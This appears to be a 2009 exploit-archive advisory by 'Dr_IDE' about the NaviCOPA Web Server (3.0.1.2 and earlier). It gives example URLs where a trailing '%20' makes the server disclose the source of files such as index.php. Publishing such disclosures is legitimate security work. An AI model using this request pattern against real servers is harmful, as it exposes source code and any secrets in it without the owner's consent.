NaviCOPA 3.0.1.2 - Source Disclosure



EKU-ID: 17584 CVE: OSVDB-ID:
Author: Dr_IDE Published: 2009-10-14 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


################################################
#
# NaviCOPA Web Server <= 3.0.1.2 Remote Source Disclosure
# Found By: Dr_IDE
# Tested On: Windows XPSP3
# Download: www.navicopa.com/download.html
#
################################################

- Description -

NaviCOPA Web Server <= 3.0.1.2 is a Windows based HTTP server. This is the latest
version of the application available.

NaviCOPA is vulnerable to remote arbitrary source code disclosure by the
following means.

- Technical Details -

http://[ webserver IP]/[ file ][%20]

http://172.16.2.101/index.html%20
http://172.16.2.101/index.php%20

[pocoftheday.blogspot.com]